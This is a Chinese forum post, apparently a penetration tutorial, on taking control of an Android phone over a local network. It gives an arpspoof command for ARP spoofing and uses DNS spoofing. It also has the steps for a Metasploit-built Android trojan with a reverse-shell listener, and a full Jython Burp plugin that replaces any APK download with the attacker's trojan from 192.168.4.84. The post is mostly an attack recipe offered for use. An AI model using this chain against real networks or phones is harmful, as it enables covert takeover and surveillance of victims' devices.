内网渗透之手机控制
从wifi破解到pc及手机控制,给大家分享个手机下载apk替换的方法
(一)环境:
目标机:192.168.247.130
渗透机kali:192.168.247.129
网关:192.168.247.2
(二)用到的工具:
1.arpspoof
2.dnsspoof
3.burp
4.jython-burp-api (kali里没有集成,需要另外安装,详细请参见:https://github.com/mwielgoszewski/jython-burp-api)
(三)步骤:
1.使用arpspoof来发送arp欺骗包;
[*]arpspoof -i eth0 -t 192.168.247.130 192.168.247.2
2.使用dnsspoof进行dns欺骗;
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oUXlRA5QCibvGCcNOmMGMVkgrAt20nmhqfQ8EUE6huYbwVOZFMTR3mSQ/0?wx_fmt=jpeg
3.使用msf来生成一个安卓木马;
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oWwpRnjBicd6BbFmQnw5h3K6fFfXoXeibGH3TGvibYgVAX54gQvOQVwj4Q/0?wx_fmt=jpeg
4.msf进行监听,等待木马反弹连接;
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oTfr9ODfCXMEU2ZzPfDrjpJoVc41YFoqEDSicWQILvibKArTN6y50EvLA/0?wx_fmt=jpeg
5.编写python脚本,用于apk下载重定向,代码如下,注意:将这段代码保存到jython-burp-api下的Lib目标下,并命名为testplugin.py;
[*]from gds.burp.api import IProxyRequestHandler
[*]from gds.burp.core import Component, implements
[*]class ExamplePlugin(Component):
[*]implements(IProxyRequestHandler)
[*]def processRequest(self, request):
[*]if ".apk" in request.url.geturl():
[*]print "apk download detected, redirecting"
[*]request.host = "192.168.4.84"
[*]request.raw = ("GET /1.apk HTTP/1.1\r\n" +
[*]"HOST: 192.168.4.84\r\n\r\n")
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9ob3aVJUVm9IuZW9hQiavz6UgCvp4tjibeicSkXQM3uech83yNp2pDu3jtQ/0?wx_fmt=png
6.编辑jython-burp-api中的burp.ini配置文件;
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oZhqCzeqsK1mVZHrylxze9nw9IpDVDymwMpicAvRNmPKicjdcOPZRpJzA/0?wx_fmt=png
7.启动burp,命令:java -Xmx1g -jar burpsutie.jar
8.对burp进行设置
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9o5jVXXwvxVk6UFOkKmXlV8KVoVoNhP5mdG9y3ibgYlC55bIs1lPINeeA/0?wx_fmt=png
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oz457BLzsXzBhpoUh1iatIKSobqlKn5DWShUOzsOUthR5xibf6oFHKPOw/0?wx_fmt=png
9.在burp里加载jython
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oicjI78rLwI6ibGuiaTIYBTUBPo6D31lyJibHVOQwicPygxlTYfopC2vYrpA/0?wx_fmt=png
10.当目标开始下载apk的时候,就会替换为我们指定的apk进行下载
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9octyr0PQSYaRXOr9aqsR18eUt4GDjKLyZqibrwsFMpickVX7SC0RrGBbg/0?wx_fmt=png
11.这时burp中的jython控制台如下:
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oDiaGVOaoRA4sKQLoq7eKympXcPQ8M0QyIdB8gebD1Z7J24iarnfjAY3A/0?wx_fmt=png
12.当目标安装并运行下载的apk后msf成功收到反弹;
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9o0HHPB6b89MASOA1Fy9kOGSQmSPloXj5SU6qKmRDiacnMRcpbvXia8Xow/0?wx_fmt=png
页:
[1]